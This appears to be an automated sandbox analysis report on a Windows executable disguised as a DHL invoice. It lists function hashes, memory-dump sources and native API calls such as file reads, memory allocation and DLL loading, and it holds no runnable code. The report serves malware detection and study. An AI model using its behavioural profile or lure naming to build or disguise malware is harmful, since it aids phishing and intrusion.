Instruction Fuzzy Hash: 7B416E71E05A588FEB6CCF6B8D4069BFAF7AFC9301F14C1B9880CAB255DB3045828E05

Uniqueness

Uniqueness Score: -1.00%

Function 07005818 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e574092a8f4a52cd69e1f574e401d524c6b0c45c0f6b8d39285395d5e07a15
Instruction ID: e0eb37d4b7e7e637f92710b0e73166f0800610567070b3fd326662f9cb61f690
Opcode Fuzzy Hash: f4e574092a8f4a52cd69e1f574e401d524c6b0c45c0f6b8d39285395d5e07a15
Instruction Fuzzy Hash: B6D1DEB07017118FEB29DB75C860BAEB7E6AF8A710F14456DE146CB6D1DB34E801CB92

Uniqueness

Uniqueness Score: -1.00%

Function 07000B30 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d485909ce7bd7bf94c254c348d08190baf54cd607a6d73b0e50d05da0ddace
Instruction ID: 037871b5fe1bcac5f2444d1bcf9b826e2605cc9cf87fc4a2e0a05a44ec48f3e8
Opcode Fuzzy Hash: 17d485909ce7bd7bf94c254c348d08190baf54cd607a6d73b0e50d05da0ddace
Instruction Fuzzy Hash: 3BE1F7B4E04219CFDB14DFA8C580AAEFBB2BF89315F248269D414AB355D730AD41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 070014E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474870228.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7000000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7930b320f36b74d80a16fe1051db7a65950350762c441821f98695f7197fd571
Instruction ID: b0afaea964a5f0d6aba0754e5e126fba192b8447b6dbf9b86e52a6de6f96861f
Opcode Fuzzy Hash: 7930b320f36b74d80a16fe1051db7a65950350762c441821f98695f7197fd571
Instruction Fuzzy Hash: B3E1F4B4E04219CFDB14DFA9C580AAEBBF2BF89315F248269D414AB355D730AD41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C5B5C0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a985a0dc00f752b840e742d91f0012371200ad0b07598d5640c69cda8f66c24e
Instruction ID: 9ccc316ebf48470fd8550a2d028085f87df851acbfc64a0a681ba5e05f50b868
Opcode Fuzzy Hash: a985a0dc00f752b840e742d91f0012371200ad0b07598d5640c69cda8f66c24e
Instruction Fuzzy Hash: 74D11735D2471ADADB10EBA4D9906DDB3B1FF95300F50C79AE5093B210EBB06AC4CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C2DE9C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465799598.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f405c45857e49be3e78188d04614e371b14b0ae8f3c0fead742af7cffc5f449
Instruction ID: 96d9392b52558526869f7a06f98e5c7a7721a8eb7aaa9c9ec7e673bb1fea52b6
Opcode Fuzzy Hash: 7f405c45857e49be3e78188d04614e371b14b0ae8f3c0fead742af7cffc5f449
Instruction Fuzzy Hash: 73A17E32E002298FCF05DFB5E94459EB7B2FF95300B25817EE816AB665DB71D906CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06C50006 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d5e224fc5e301beafb7ae833015dc04643555958ca6be94d81a8eeaafba29e
Instruction ID: 9002f21408e66b4ab9bc4d7fd8df8304bcb6d5905365f6d3d650b4c927356d87
Opcode Fuzzy Hash: 76d5e224fc5e301beafb7ae833015dc04643555958ca6be94d81a8eeaafba29e
Instruction Fuzzy Hash: 66419F71E05B548FE759CF6B8D4028AFBF3AFC9201F19C1BA845CAB165E73449868F11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DHL Factura Electronica Pendiente documento No 04BB25083.exePID: 7760, Parent PID: 7472COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.8%
Total number of Nodes:	556
Total number of Limit Nodes:	68

Executed Functions

Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
!JA, xrefs: 0041A41C, 0041A428
bMA, xrefs: 0041A43D, 0041A444

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A52A Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 228644025f840f7fee6e35e43d606d2cd65501fa599a09edf95dbb4ed57bdd68
Instruction ID: 5ffd9728610d5dd4d37788f4d0a412f800f0528348d8b23841a4b3b5204e8e6b
Opcode Fuzzy Hash: 228644025f840f7fee6e35e43d606d2cd65501fa599a09edf95dbb4ed57bdd68
Instruction Fuzzy Hash: 52F058B1200208ABCB18DF88CC91EE737ACAF88314F108148BE0C97252C630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A47C Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 2a6e77dc6e63fa20358b6d1967c4757a1df7cb8c207af33ae23075fd2ab79126
Instruction ID: 74f325f6456e40746026e1435586509bfe7f73128666eae7e8e5cd7dfe80f1a7
Opcode Fuzzy Hash: 2a6e77dc6e63fa20358b6d1967c4757a1df7cb8c207af33ae23075fd2ab79126
Instruction Fuzzy Hash: 2EE012762402146FD714EBD4CC45FD77768EF44764F154499BA2C9B242C534E61087D0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

Uniqueness

Uniqueness Score: -1.00%

Function 01982BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982BFA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb6eb0cd2d4c7c21fb9f76e72d20f46b5ddb28255b046133fab3c58728bb6026
Instruction ID: 1419f28ccbf0100097e0335b88da76228feee71edd06940f15515562471adea6
Opcode Fuzzy Hash: cb6eb0cd2d4c7c21fb9f76e72d20f46b5ddb28255b046133fab3c58728bb6026
Instruction Fuzzy Hash: 6E90023120250C02D680715C440864A404997D2301F95C019A0069654DCA1A8B5977A5

Uniqueness

Uniqueness Score: -1.00%

Function 01982B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982B6A

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc3d688c0b955a063a5969feb3018bfcb8362d47620c2c3c4fea9c0641ccdcde
Instruction ID: afa99401afe53eef8c3d5ae555dc654668b1ce990bd3b89390feeba8c3b4adc4
Opcode Fuzzy Hash: bc3d688c0b955a063a5969feb3018bfcb8362d47620c2c3c4fea9c0641ccdcde
Instruction Fuzzy Hash: 31900261203504034605715C4418616804E97E1201B55C025E1058590DC52A89916229

Uniqueness

Uniqueness Score: -1.00%

Function 01982AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982ADA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b80217fd712f9756393a85653a4f55b4adf13546f63082962f0d27da9a967dc
Instruction ID: 0192c98f9a5761d19a16dd8771b7ce85b645779d660877fbb82bdc08eddf560e
Opcode Fuzzy Hash: 6b80217fd712f9756393a85653a4f55b4adf13546f63082962f0d27da9a967dc
Instruction Fuzzy Hash: 05900225212504030605B55C0708507408A97D6351355C025F1059550CD62689615225

Uniqueness

Uniqueness Score: -1.00%

Function 01982DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982DDA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 637488612ba3ae66fe4e20e74ca439c2cb0a572ad65818e84d1ec3e357b943bb
Instruction ID: 58d03e9c751a5d37823052b02246a3a833ffbf8a1a21f8b62a3abf943e281b4a
Opcode Fuzzy Hash: 637488612ba3ae66fe4e20e74ca439c2cb0a572ad65818e84d1ec3e357b943bb
Instruction Fuzzy Hash: 8D900221243545525A45B15C4408507804AA7E1241795C016A1458950CC52B9956D725

Uniqueness

Uniqueness Score: -1.00%

Function 01982DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982DFA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e4b8ebbe464968644c401eeaf8dd560f5baa1b40674d0ac2a130cd0aee7c856
Instruction ID: 5e94db89906ec16af423fb82357e47a7ea0950bec20c1afcf252967b32f43ebe
Opcode Fuzzy Hash: 2e4b8ebbe464968644c401eeaf8dd560f5baa1b40674d0ac2a130cd0aee7c856
Instruction Fuzzy Hash: 8390023120250813D611715C4508707404D97D1241F95C416A0468558DD65B8A52A225

Uniqueness

Uniqueness Score: -1.00%

Function 01982D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982D1A

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09eebc48a708453c5f923e69f4ed8361d7cc4fe9c3f1b0a99ba4f6e928761dd2
Instruction ID: 1f839154bd7e5149d5ef44955bf594d2bc03a9e345e42147b5bce28a8ba189d7
Opcode Fuzzy Hash: 09eebc48a708453c5f923e69f4ed8361d7cc4fe9c3f1b0a99ba4f6e928761dd2
Instruction Fuzzy Hash: 2090022921350402D680715C540C60A404997D2202F95D419A0059558CC91A89695325

Uniqueness

Uniqueness Score: -1.00%

Function 01982D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982D3A

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 304771c5e256cabdc666a827c001688df6b96b7538684f53c6b0ab5ddbe85d1f
Instruction ID: 3067bbce087b589abfc1377a82300c94b30870b1ceaee3bd65c05b1f312eb75c
Opcode Fuzzy Hash: 304771c5e256cabdc666a827c001688df6b96b7538684f53c6b0ab5ddbe85d1f
Instruction Fuzzy Hash: FA90022130250403D640715C541C6068049E7E2301F55D015E0458554CD91A89565326

Uniqueness

Uniqueness Score: -1.00%

Function 01982CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982CAA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c785581f12fd7429fb8142cbca86edf2c1020aec359d35507fd9f285c5c3f17
Instruction ID: 93f5d6aceea0bb1ff89ac5979a677a535db77512912dc15d32491d468e801c1e
Opcode Fuzzy Hash: 7c785581f12fd7429fb8142cbca86edf2c1020aec359d35507fd9f285c5c3f17
Instruction Fuzzy Hash: 9190023120250802D600759C540C646404997E1301F55D015A5068555EC66A89916235

Uniqueness

Uniqueness Score: -1.00%

Function 01982C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982C7A

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f6cd40fa9eef01796a1927e0609b4ba8c3dba1c62f70be6431c80a14f9d26f6
Instruction ID: b0df72744652b7c31aaf92622abfe7fb6aebb94900d9c1cf9ab1b118f9517fe9
Opcode Fuzzy Hash: 2f6cd40fa9eef01796a1927e0609b4ba8c3dba1c62f70be6431c80a14f9d26f6
Instruction Fuzzy Hash: C390023120258C02D610715C840874A404997D1301F59C415A4468658DC69A89917225

Uniqueness

Uniqueness Score: -1.00%

Function 01982F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982F9A

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c372fee35af2ccd65f3d0fb328e2ec5f874b99fa85adf9e470268617f8bbc970
Instruction ID: 008c5f01bbfbb33a4df3e95c4e5683b95f9e544f545744f63d24427533edbfea
Opcode Fuzzy Hash: c372fee35af2ccd65f3d0fb328e2ec5f874b99fa85adf9e470268617f8bbc970
Instruction Fuzzy Hash: 9B90023120290802D600715C481870B404997D1302F55C015A11A8555DC62A89516675

Uniqueness

Uniqueness Score: -1.00%

Function 01982FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982FBA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8636f520a54791ee73c4a40baf2075f01ab8adb761dfb4940a6eef6badf36da7
Instruction ID: c68ca02023b61e0d1b4f1d18de9bf36804055bb76274ba00699a1a86842fa205
Opcode Fuzzy Hash: 8636f520a54791ee73c4a40baf2075f01ab8adb761dfb4940a6eef6badf36da7
Instruction Fuzzy Hash: 19900221602504424640716C88489068049BBE2211755C125A09DC550DC55E89655769

Uniqueness

Uniqueness Score: -1.00%

Function 01982FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982FEA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9dd0a27983a86130cd47536b795e0a2ac00ad1c4adb5ec9ae2e320c8d59c60d4
Instruction ID: 2f61f581e35051fd9a90e234fdef191266dcb4e28edd6d83bad6f492bfc956cb
Opcode Fuzzy Hash: 9dd0a27983a86130cd47536b795e0a2ac00ad1c4adb5ec9ae2e320c8d59c60d4
Instruction Fuzzy Hash: F6900221212D0442D700756C4C18B07404997D1303F55C119A0198554CC91A89615625

Uniqueness

Uniqueness Score: -1.00%

Function 01982F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982F3A

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c574972f68f37948f2cc0ca12d619d223d9997ef6cc17a50e1b78ad3de013e8
Instruction ID: 9bc044dd39fa6b5999f90547b991fd07408f4ee099c011c45441289514f60d16
Opcode Fuzzy Hash: 9c574972f68f37948f2cc0ca12d619d223d9997ef6cc17a50e1b78ad3de013e8
Instruction Fuzzy Hash: EE90026134250842D600715C4418B064049D7E2301F55C019E10A8554DC61ECD52622A

Uniqueness

Uniqueness Score: -1.00%

Function 01982E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982E8A

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bee59e6a14efba33c6594ff4c859080ebc56f0218d4edc77c9d36f1d9ee3de9
Instruction ID: 3c6c38a2ad735bc68576ce30af4bdf09efd06217e143e984e4c6dac3cae28ddd
Opcode Fuzzy Hash: 9bee59e6a14efba33c6594ff4c859080ebc56f0218d4edc77c9d36f1d9ee3de9
Instruction Fuzzy Hash: A890022160250902D601715C4408616404E97D1241F95C026A1068555ECA2A8A92A235

Uniqueness

Uniqueness Score: -1.00%

Function 01982EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982EAA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2ed54bda7ad3036af9b7dd3a905d2dc029a7e8291b9150a1af1fdc57520187e
Instruction ID: 60674abf1b9a36a5d4855f5019013d04af9acda2b6c803c33c36bfdcce84870d
Opcode Fuzzy Hash: a2ed54bda7ad3036af9b7dd3a905d2dc029a7e8291b9150a1af1fdc57520187e
Instruction Fuzzy Hash: 4E90027120250802D640715C4408746404997D1301F55C015A50A8554EC65E8ED56769

Uniqueness

Uniqueness Score: -1.00%

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A693 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

